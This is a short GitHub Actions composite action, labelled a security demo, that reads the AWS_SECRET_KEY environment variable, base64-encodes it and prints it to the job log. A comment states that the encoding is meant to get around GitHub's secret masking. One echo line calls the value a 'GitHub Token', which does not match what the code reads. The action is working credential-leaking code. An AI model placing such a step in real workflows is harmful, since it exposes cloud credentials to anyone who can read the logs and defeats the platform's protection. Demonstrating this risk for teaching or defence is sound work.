name: "Secret Exfiltration Action"
description: "A reusable action to demonstrate secret exfiltration risks."
author: "Security Demo"
runs:
  using: "composite"
  steps:
    - name: 🔥 Extract and Exfiltrate Secrets
      run: |
        echo "🔓 Extracting GitHub Token..."
        AWS_SECRET=$(printenv AWS_SECRET_KEY)

        # Encode secrets to bypass GitHub masking
        echo "🔓 Base64 Encoded AWS_SECRET_KEY: $(echo $AWS_SECRET | base64)"

      shell: bash
